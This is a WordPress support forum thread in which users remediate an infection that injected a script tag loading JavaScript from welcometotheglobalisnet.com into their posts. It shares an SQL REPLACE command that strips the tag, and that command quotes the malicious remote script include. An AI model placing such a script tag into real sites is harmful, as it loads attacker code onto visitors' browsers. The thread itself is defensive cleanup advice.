New "welcometotheglobalisnet" malware script targetting wp sites

Viewing 6 replies - 1 through 6 (of 6 total)
  • Thread Starter theshine

    (@theshine)

    Here’s how I disinfected the virus, hopefully that’s it:
    UPDATE wp_posts
    SET post_content=(
    REPLACE (post_content,
    ‘<script src=\”https://welcometotheglobalisnet.com/js.php?kk=25\”></script>’,
    ”));

    Any advice on hardening?

    migrationology

    (@migrationology)

    Hi, I have the same problem now, where did you post that command?

    Thread Starter theshine

    (@theshine)

    You need to execute that command in your SQL server client. If you have GoDaddy, then you will need to login to PHPMyAdmin.

    migrationology

    (@migrationology)

    I restored my files on GoDaddy to 4 days ago and it seems to have worked, but now my site is flagged by google.
    Do you think I still need to command?

    Thread Starter theshine

    (@theshine)

    The script doesn’t live in the files, it lives in the database (at least that was the case for me). GoDaddy backs up files regularly, but not databases (at least not on-site). If you don’t see the script on your site anymore, you might be OK, but it really can’t hurt to run the SQL script. Make sure you back up your database before you attempt to make the changes though.

    migrationology

    (@migrationology)

    Thanks so much for your help!

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘New "welcometotheglobalisnet" malware script targetting wp sites’ is closed to new replies.

Tags